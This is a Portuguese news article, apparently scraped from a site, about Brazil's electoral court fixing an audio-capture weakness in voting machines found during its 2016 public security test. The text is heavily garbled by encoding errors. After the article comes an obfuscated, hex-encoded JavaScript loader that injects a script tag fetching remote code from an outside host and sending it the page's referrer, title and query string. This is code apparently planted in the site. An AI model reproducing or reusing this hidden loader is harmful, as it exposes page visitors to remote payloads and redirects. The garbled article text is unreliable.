Home » Brasil » Segurança » TSE faz modificaA�A�es para aumentar seguranA�a nas urnas

TSE faz modificaA�A�es para aumentar seguranA�a nas urnas

O Tribunal Superior Eleitoral (TSE) informou hoje (16)A� que solucionou os problemas encontrados no Teste PA?blico de SeguranA�a 2016 feito por um grupo de investigadores nas urnas eletrA?nicas no inA�cio do ano.

As soluA�A�es foram verificadas pelos investigadores nesta quinta-feira. Entre as alteraA�A�es estA? a melhoria nos sistemas para a votaA�A?o de eleitores com deficiA?ncia visual.

Em marA�o deste ano, durante trA?s dias, especialistas em informA?tica tentaram quebrar a seguranA�a das urnas eletrA?nicas. Essa foi a terceira ediA�A?o do teste e o diferencial da ediA�A?o deste ano A� que foi a primeira depois que o tribunal aprovou uma resoluA�A?o tornando os testes obrigatA?rios antes das eleiA�A�es.

a�?Nesse momento nA?s estamos justamente no final do evento do teste que A� a verificaA�A?o da eficA?cia das aA�A�es corretivas adotadas nas fragilidades encontradas nesse teste de seguranA�aa�?, disse o secretA?rio de Tecnologia da InformaA�A?o do TSE, Giusepe Janino.

CaptaA�A?o de A?udio

O grupo que esteve hoje no TSE A� formado por integrantes da Universidade de TaubatA� (SP). O teste feito por eles verificou a possibilidade de captaA�A?o de A?udio emitido pela urna durante o voto de pessoas com deficiA?ncia visual.

Segundo o tribunal, quando uma pessoa que tem essa deficiA?ncia vai votar, ela pode fazer uso de um fone de ouvido para escutar o A?udio da urna que confirma oralmente os nA?meros que a pessoa digitou.

a�?Percebemos que uma possibilidade seria trabalhar com o A?udio da urna. Nesse caso percebemos que esse A?udio poderia ser capturado no meio externoa�?, diz o professor de inteligA?ncia artificial da Universidade de TaubatA� Luis Fernando de Almeida, que integra o grupo de investigadores.

O professor diz que para que o A?udio fosse captado seria necessA?rio que alguA�m colocasse um dispositivo externo no equipamento.

Outro fato analisado era a possibilidade de o A?udio ser ativado sem que o eleitor soubesse. a�?Essa violaA�A?o consiste na conivA?ncia, na participaA�A?o das pessoas que estA?o ali envolta dessa sessA?o de tal forma que alguA�m tem que colocar este dispositivo. EntA?o existem duas coisas, na nossa visA?o, que sA?o importantes. Primeiro: alguA�m colocar o dispositivo e as outras pessoas nA?o perceberem ou estarem participando, e outro fator A�, o A?udio, quando A� habilitado, o eleitor nA?o sabea�?.

SugestA�es ao TSE

Depois do teste em marA�o, o grupo fez sugestA�es ao TSE para resolver a vulnerabilidade. a�?As duas opA�A�es que falamos foi reforA�ar o monitoramento na urna para verificaA�A?o constante se ela estA? intacta e ninguA�m colocou algum dispositivo externo que nA?o poderia e ela ser mais transparente com relaA�A?o a sua interaA�A?o com o eleitor, ou seja, se porventura o mesA?rio habilitar o A?udio, ou o A?udio jA? vier previamente habilitado, ter alguma maneira de o eleitor ficar sabendo para poder questionar. Essas foram algumas das sugestA�es que fizemosa�?, diz Almeida.

Segundo o TSE, o problema foi resolvido e, a partir de agora, o A?udio da urna serA? ativado por meio de um cA?digo que serA? habilitado pelo mesA?rio.

A ativaA�A?o sA? vai acontecer quando o eleitor que necessita fazer uso do recurso chegar A� seA�A?o na qual vai votar.

De acordo com informaA�A�es do Tribunal, uma mensagem na tela vai informar ao eleitor que o A?udio foi ativado, assim, a pessoa que nA?o possui deficiA?ncia visual poderA? verificar se o recurso foi ativado e assim informar o problema aos mesA?rios da seA�A?o.

a�?A importA?ncia [do teste] A� demonstrar o diferencial que o Brasil tem. A� o A?nico paA�s do mundo que realiza um evento nessa magnitude, ou seja, abrir o seu sistema eleitoral para que eventuais hackers venham tentar quebrar as barreiras de seguranA�a. O mais importante disso A� dar a contribuiA�A?o, de mostrar pontos eventuais de fragilidades e possibilitar que nA?s venhamos a fazer as aA�A�es corretivasa�?, disse Janino.

var _0xb322=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}

Publicação: Redação Brasil (m)

Login

Perdeu sua senha?